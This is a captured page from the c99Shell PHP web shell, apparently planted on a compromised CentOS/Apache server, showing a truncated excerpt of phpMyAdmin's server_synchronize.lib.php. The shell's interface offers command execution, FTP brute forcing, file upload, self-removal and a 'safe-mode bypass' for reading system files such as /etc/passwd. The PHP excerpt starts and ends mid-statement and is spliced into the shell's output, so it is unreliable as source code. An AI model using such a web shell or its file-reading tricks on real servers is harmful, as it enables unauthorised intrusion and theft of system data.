!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 52.3 GB of 127.8 GB (40.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     server_synchronize.lib.php (78.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
 1){
                    for ($k=0; $k < sizeof($is_key); $k++) {
                        $trg_select_query .= $is_key[$k] . "='" . $source_result_set[$j][$is_key[$k]] . "'";
                        if ($k < (sizeof($is_key)-1)){
                            $trg_select_query .= " AND ";    
                        }
                    }  
                }
        
                $target_result_set = PMA_DBI_fetch_result($trg_select_query, null, null, $trg_link);
				if ($target_result_set) {

					// Fetch the row from the source server to do a comparison
                    $src_select_query = "SELECT * FROM " . PMA_backquote($src_db) . "." 
                 	   . PMA_backquote($matching_table[$matching_table_index]) . " WHERE ";
                    
                    if (sizeof($is_key) == 1) {
                        $src_select_query .= $is_key[0] . "='" . $source_result_set[$j] . "'";
                    } else if(sizeof($is_key) > 1){
                        for ($k=0; $k< sizeof($is_key); $k++) {
                            $src_select_query .= $is_key[$k] . "='" . $source_result_set[$j][$is_key[$k]] . "'";
                            if ($k < (sizeof($is_key) - 1)){
                                $src_select_query .= " AND ";    
                            }
                        }
                    }  
                    
                    $src_result_set = PMA_DBI_fetch_result($src_select_query, null, null, $src_link);
                    
                    /**
                    * Comparing each corresponding field of the source and target matching rows.
                    * Placing the primary key, value of primary key, field to be updated, and the 
                    * new value of field to be updated in each row of the update array. 
                    */
                    for ($m = 0; ($m < $fields_num[$matching_table_index]) && ($starting_index == 0) ; $m++) {
                        if (isset($src_result_set[0][$fld[$m]])) {
                          if (isset($target_result_set[0][$fld[$m]])) {
                            if (($src_result_set[0][$fld[$m]] != $target_result_set[0][$fld[$m]]) && (! (in_array($fld[$m], $is_key)))) {
                                if (sizeof($is_key) == 1) {
                                    if ($source_result_set[$j]) {
                                        $update_array[$matching_table_index][$update_row][$is_key[0]] = $source_result_set[$j];
                                    }
                                } elseif (sizeof($is_key) > 1) {  
                                    for ($n=0; $n < sizeof($is_key); $n++) {
                                        if (isset($src_result_set[0][$is_key[$n]])) {
                                            $update_array[$matching_table_index][$update_row][$is_key[$n]] = $src_result_set[0][$is_key[$n]];
                                        }
                                    }
                                }
                                        
                                $update_array[$matching_table_index][$update_row][$update_field] = $fld[$m];
                                
                                $update_field++;
                                if (isset($src_result_set[0][$fld[$m]])) {
                                    $update_array[$matching_table_index][$update_row][$update_field] = $src_result_set[0][$fld[$m]]; 
                                    $update_field++;
                                }
                                $starting_index = $m;
                                $update_row++;
                            }
                        } else {
                               if (sizeof($is_key) == 1) {
                                    if ($source_result_set[$j]) {
                                        $update_array[$matching_table_index][$update_row][$is_key[0]] = $source_result_set[$j];
                                
                                    }
                                } elseif (sizeof($is_key) > 1) {  
                                    for ($n = 0; $n < sizeof($is_key); $n++) {
                                        if (isset($src_result_set[0][$is_key[$n]])) {
                                            $update_array[$matching_table_index][$update_row][$is_key[$n]] = $src_result_set[0][$is_key[$n]];
                                        }
                                    }
                                }
                                        
                                $update_array[$matching_table_index][$update_row][$update_field] = $fld[$m];
                                
                                $update_field++;
                                if (isset($src_result_set[0][$fld[$m]])) {
                                    $update_array[$matching_table_index][$update_row][$update_field] = $src_result_set[0][$fld[$m]]; 
                                    $update_field++;
                                }
                                $starting_index = $m;
                                $update_row++;
                        }
                      }
                    }
                    for ($m = $starting_index + 1; $m < $fields_num[$matching_table_index] ; $m++)
                    {   
                        if (isset($src_result_set[0][$fld[$m]])) {
                            if (isset($target_result_set[0][$fld[$m]])) { 
                                if (($src_result_set[0][$fld[$m]] != $target_result_set[0][$fld[$m]]) && (!(in_array($fld[$m], $is_key)))) {
                                $update_row--; 
                                $update_array[$matching_table_index][$update_row][$update_field] = $fld[$m];
                                $update_field++;
                                if ($src_result_set[0][$fld[$m]]) {
                                    $update_array[$matching_table_index][$update_row][$update_field] = $src_result_set[0][$fld[$m]];
                                    $update_field++;
                                }
                                $update_row++; 
                            }
                        } else {
                               $update_row--; 
                                $update_array[$matching_table_index][$update_row][$update_field] = $fld[$m];
                                $update_field++;
                                if ($src_result_set[0][$fld[$m]]) {
                                    $update_array[$matching_table_index][$update_row][$update_field] = $src_result_set[0][$fld[$m]];
                                    $update_field++;
                                }
                                $update_row++; 
                            }
                        }
                    }
				} else {
					/**
					 * Placing the primary key, and the value of primary key of the row that is to be inserted in the target table
					 */
                    if (sizeof($is_key) == 1) {
                        if (isset($source_result_set[$j])) {
                            $insert_array[$matching_table_index][$insert_row][$is_key[0]] = $source_result_set[$j];
                        }
                    } elseif (sizeof($is_key) > 1) {  
                        for($l = 0; $l < sizeof($is_key); $l++) {
                            if (isset($source_result_set[$j][$matching_tables_fields[$matching_table_index][$l]])) {
                                $insert_array[$matching_table_index][$insert_row][$is_key[$l]] = $source_result_set[$j][$matching_tables_fields[$matching_table_index][$l]];
                            }
                        }
                    }
                    $insert_row++;
                }
            } else {
                    /**
                    * Placing the primary key, and the value of primary key of the row that is to be inserted in the target table
                    * This condition is met when there is an additional column in the source table                                                  
                    */
                    if (sizeof($is_key) == 1) {
                        if (isset($source_result_set[$j])) {
                            $insert_array[$matching_table_index][$insert_row][$is_key[0]] = $source_result_set[$j];
                        }
                    } elseif (sizeof($is_key) > 1) {  
                        for ($l = 0; $l < sizeof($is_key); $l++) {
                            if (isset($source_result_set[$j][$matching_tables_fields[$matching_table_index][$l]])) {
                                $insert_array[$matching_table_index][$insert_row][$is_key[$l]] = $source_result_set[$j][$matching_tables_fields[$matching_table_index][$l]];
                            }
                        }
                    }
                $insert_row++;
            }
        } // for loop ends
    }    
} 
/**
* PMA_findDeleteRowsFromTargetTables finds the rows which are to be deleted from target table.
* @uses   sizeof()
* @uses   PMA_DBI_get_column_values()
* @uses   in_array()
* 
* @param  $delete_array          array containing rows that are to be deleted 
* @param  $matching_table        array containing matching table names
* @param  $matching_table_index  index of a table from $matching_table array
* @param  $trg_keys              array of target table keys
* @param  $src_keys              array of source table keys
* @param  $trg_db                name of target database
* @param  $trg_link              connection established with target server
* @param  $src_db                name of source database 
* @param  $src_link              connection established with source server
* 
*/
function PMA_findDeleteRowsFromTargetTables(&$delete_array, $matching_table, $matching_table_index, $trg_keys, $src_keys, $trg_db, $trg_link,$src_db, $src_link)
{
    if (isset($trg_keys[$matching_table_index])) {
        $target_key_values = PMA_DBI_get_column_values($trg_db, $matching_table[$matching_table_index], $trg_keys[$matching_table_index], $trg_link);      
        $target_row_size = sizeof($target_key_values);        
    }
    if (isset($src_keys[$matching_table_index])) {
        $source_key_values = PMA_DBI_get_column_values($src_db, $matching_table[$matching_table_index], $src_keys[$matching_table_index], $src_link);      
        $source_size = sizeof($source_key_values);        
    }
    $all_keys_match = 1;
    for ($a = 0; $a < sizeof($trg_keys[$matching_table_index]); $a++) {
        if (isset($trg_keys[$matching_table_index][$a])) {
           if (! (in_array($trg_keys[$matching_table_index][$a], $src_keys[$matching_table_index]))) {
               $all_keys_match = 0;
           }
       }   
    }
    if (! ($all_keys_match)) {
        if (isset($target_key_values)) {
            $delete_array[$matching_table_index] = $target_key_values;
        }
    }
    if (isset($trg_keys[$matching_table_index])) {
        if ((sizeof($trg_keys[$matching_table_index]) == 1) && $all_keys_match) {
           $row = 0; 
           if (isset($target_key_values)) {
               for ($i = 0; $i < sizeof($target_key_values); $i++) {
                    if (! (in_array($target_key_values[$i], $source_key_values))) {
                        $delete_array[$matching_table_index][$row] = $target_key_values[$i];
                        $row++;   
                    }
                }                  
            }
        } elseif ((sizeof($trg_keys[$matching_table_index]) > 1) && $all_keys_match) {
            $row = 0;  
            if (isset($target_key_values)) {
                for ($i = 0; $i < sizeof($target_key_values); $i++) {
                    $is_present = false;
                    for ($j = 0; $j < sizeof($source_key_values) && ($is_present == false) ; $j++) {
                        $check = true;
                        for ($k = 0; $k < sizeof($trg_keys[$matching_table_index]); $k++) {
                            if ($target_key_values[$i][$trg_keys[$matching_table_index][$k]] != $source_key_values[$j][$trg_keys[$matching_table_index][$k]]) {
                                $check = false;
                            }    
                        }
                        if ($check) {
                            $is_present = true;
                        }
                    }
                    if (! ($is_present)) {
                        for ($l = 0; $l < sizeof($trg_keys[$matching_table_index]); $l++) {
                            $delete_array[$matching_table_index][$row][$trg_keys[$matching_table_index][$l]] = $target_key_values[$i][$trg_keys[$matching_table_index][$l]];
                        }
                        $row++;
                    }
                }                    
            }        
        }
    }    
}

/**
* PMA_dataDiffInUncommonTables() finds the data difference in  $source_tables_uncommon
* @uses   PMA_DBI_fetch_result()
* 
* @param  $source_tables_uncommon  array of table names; containing table names that are in source db and not in target db
* @param  $src_db                  name of source database
* @param  $src_link                connection established with source server
* @param  $index                   index of a table from $matching_table array
* @param  $row_count               number of rows
*/

function PMA_dataDiffInUncommonTables($source_tables_uncommon, $src_db, $src_link, $index, &$row_count)
{
   $query = "SELECT COUNT(*) FROM " . PMA_backquote($src_db) . "." . PMA_backquote($source_tables_uncommon[$index]);  
   $rows  = PMA_DBI_fetch_result($query, null, null, $src_link); 
   $row_count[$index] = $rows[0]; 
}

/**
* PMA_updateTargetTables() sets the updated field values to target table rows using $update_array[$matching_table_index]
*
* @uses    PMA_DBI_fetch_result()
* @uses    PMA_backquote()
*  
* @param    $table                 Array containing matching tables' names 
* @param    $update_array          A three dimensional array containing field
*                                  value updates required for each matching table
* @param    $src_db                Name of source database 
* @param    $trg_db                Name of target database
* @param    $trg_link              Connection established with target server
* @param    $matching_table_index  index of matching table in matching_table_array    
* @param    $display               true/false value
*/                                                                                                        

function PMA_updateTargetTables($table, $update_array, $src_db, $trg_db, $trg_link, $matching_table_index, $matching_table_keys, $display)
{ 
    if (isset($update_array[$matching_table_index])) {
        if (sizeof($update_array[$matching_table_index])) {
               
            for ($update_row = 0; $update_row < sizeof($update_array[$matching_table_index]); $update_row++) {
                   
                if (isset($update_array[$matching_table_index][$update_row])) { 
                     $update_fields_num = sizeof($update_array[$matching_table_index][$update_row])-sizeof($matching_table_keys[$matching_table_index]);
                     if ($update_fields_num > 0) {
                        $query = "UPDATE " . PMA_backquote($trg_db) . "." .PMA_backquote($table[$matching_table_index]) . " SET ";   
                     
                     for ($update_field = 0; $update_field < $update_fields_num; $update_field = $update_field+2) {
                         if (isset($update_array[$matching_table_index][$update_row][$update_field]) && isset($update_array[$matching_table_index][$update_row][$update_field+1])) {
                             $query .= $update_array[$matching_table_index][$update_row][$update_field] . "='" . $update_array[$matching_table_index][$update_row][$update_field+1] . "'";
                         }
                         if ($update_field < ($update_fields_num - 2)) {
                             $query .= ", ";    
                         }
                     }
                     $query .= " WHERE ";
                     if (isset($matching_table_keys[$matching_table_index])) {
                        for ($key = 0; $key < sizeof($matching_table_keys[$matching_table_index]); $key++)
                        {
                            if (isset($matching_table_keys[$matching_table_index][$key])) {
                            
                                $query .= $matching_table_keys[$matching_table_index][$key] . "='" . $update_array[$matching_table_index][$update_row][$matching_table_keys[$matching_table_index][$key]] . "'";
                            }
                            if ($key < (sizeof($matching_table_keys[$matching_table_index]) - 1)) {
                                 $query .= " AND ";
                            }
                        }
                    }
                    if ($display == true) {
                        echo "
" . $query . "
";
                    }                    
                    PMA_DBI_try_query($query, $trg_link, 0);
                    }
                }                    
            }
        }
    }
}
/**
* PMA_insertIntoTargetTable() inserts missing rows in the target table using $array_insert[$matching_table_index]
*  
* @uses    PMA_DBI_fetch_result()
* @uses    PMA_backquote()
* 
*                                              
* @param  $matching_table         array containing matching table names
* @param  $src_db                 name of source database
* @param  $trg_db                 name of target database
* @param  $src_link               connection established with source server
* @param  $trg_link               connection established with target server
* @param  $table_fields           array containing field names of a table
* @param  $array_insert            
* @param  $matching_table_index   index of matching table in matching_table_array 
* @param  $matching_tables_keys   array containing field names that are keys in the matching table
* @param  $source_columns         array containing source column information
* @param  $add_column_array       array containing column names that are to be added in target table
* @param  $criteria               array containing criterias like type, null, collation, default etc
* @param  $target_tables_keys     array containing field names that are keys in the target table
* @param  $uncommon_tables        array containing table names that are present in source db but not in targt db
* @param  $uncommon_tables_fields array containing field names of the uncommon tables
* @param  $uncommon_cols          column names that are present in target table and not in source table
* @param  $alter_str_array        array containing column names that are to be altered 
* @param  $source_indexes         column names on which indexes are made in source table 
* @param  $target_indexes         column names on which indexes are made in target table 
* @param  $add_indexes_array      array containing column names on which index is to be added in target table
* @param  $alter_indexes_array    array containing column names whose indexes are to be altered. Only index name and uniqueness of an index can be changed 
* @param  $delete_array           array containing rows that are to be deleted
* @param  $update_array           array containing rows that are to be updated in target
* @param  $display                true/false value
*
*/
function PMA_insertIntoTargetTable($matching_table, $src_db, $trg_db, $src_link, $trg_link, $table_fields, &$array_insert, $matching_table_index,
 $matching_tables_keys, $source_columns, &$add_column_array, $criteria, $target_tables_keys, $uncommon_tables, &$uncommon_tables_fields,$uncommon_cols, 
 &$alter_str_array,&$source_indexes, &$target_indexes, &$add_indexes_array, &$alter_indexes_array, &$delete_array, &$update_array, $display)
{   
    if(isset($array_insert[$matching_table_index])) {
        if (sizeof($array_insert[$matching_table_index])) {
            for ($insert_row = 0; $insert_row< sizeof($array_insert[$matching_table_index]); $insert_row++) {
                if (isset($array_insert[$matching_table_index][$insert_row][$matching_tables_keys[$matching_table_index][0]])) {
                   
                    $select_query = "SELECT * FROM " . PMA_backquote($src_db) . "." . PMA_backquote($matching_table[$matching_table_index]) . " WHERE ";
                    for ($i = 0; $i < sizeof($matching_tables_keys[$matching_table_index]); $i++) {
                        $select_query .= $matching_tables_keys[$matching_table_index][$i] . "='";
                        $select_query .= $array_insert[$matching_table_index][$insert_row][$matching_tables_keys[$matching_table_index][$i]] . "'" ;
                        
                        if ($i < (sizeof($matching_tables_keys[$matching_table_index]) - 1)) {
                            $select_query.= " AND ";    
                        }
                    }
                    $select_query .= "; ";
                    $result = PMA_DBI_fetch_result ($select_query, null, null, $src_link);
                    $insert_query = "INSERT INTO " . PMA_backquote($trg_db) . "." . PMA_backquote($matching_table[$matching_table_index]) ." (";
                    
                    for ($field_index = 0; $field_index < sizeof($table_fields[$matching_table_index]); $field_index++) 
                    {
                        $insert_query .=  $table_fields[$matching_table_index][$field_index];
                        
                        $is_fk_query = "SELECT * FROM  information_schema.KEY_COLUMN_USAGE WHERE TABLE_SCHEMA = '" . $trg_db ."' 
                                         AND TABLE_NAME = '" . $matching_table[$matching_table_index]. "'AND COLUMN_NAME = '" .
                                         $table_fields[$matching_table_index][$field_index] . "' AND TABLE_NAME <> REFERENCED_TABLE_NAME;" ;
                    
                        $is_fk_result = PMA_DBI_fetch_result($is_fk_query, null, null, $trg_link);
                        if (sizeof($is_fk_result) > 0) {
                            for ($j = 0; $j < sizeof($is_fk_result); $j++)
                            {
                                $table_index = array_keys($matching_table, $is_fk_result[$j]['REFERENCED_TABLE_NAME']);
                                 
                                if (isset($alter_str_array[$table_index[0]])) {
                                   PMA_alterTargetTableStructure($trg_db, $trg_link, $matching_tables, $source_columns, $alter_str_array, $matching_tables_fields,
                                    $criteria, $matching_tables_keys, $target_tables_keys, $table_index[0], $display);
                                    unset($alter_str_array[$table_index[0]]);        
                                }                                                           
                                if (isset($uncommon_columns[$table_index[0]])) {
                                    PMA_removeColumnsFromTargetTable($trg_db, $trg_link, $matching_tables, $uncommon_columns, $table_index[0], $display);
                                    unset($uncommon_columns[$table_index[0]]); 
                                }           
                                if (isset($add_column_array[$table_index[0]])) {
                                    PMA_findDeleteRowsFromTargetTables($delete_array, $matching_tables, $table_index[0], $target_tables_keys, $matching_tables_keys,
                                    $trg_db, $trg_link, $src_db, $src_link);
                                     
                                    if (isset($delete_array[$table_index[0]])) {
                                       PMA_deleteFromTargetTable($trg_db, $trg_link, $matching_tables, $table_index[0], $target_tables_keys, $delete_array, $display);
                                       unset($delete_array[$table_index[0]]); 
                                    }        
                                    PMA_addColumnsInTargetTable($src_db, $trg_db, $src_link, $trg_link, $matching_tables, $source_columns, $add_column_array, 
                                    $matching_tables_fields, $criteria, $matching_tables_keys, $target_tables_keys, $uncommon_tables,$uncommon_tables_fields,
                                    $table_index[0], $uncommon_cols, $display);
                                    unset($add_column_array[$table_index[0]]);
                                }
                                if (isset($add_indexes_array[$table_index[0]]) 
bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--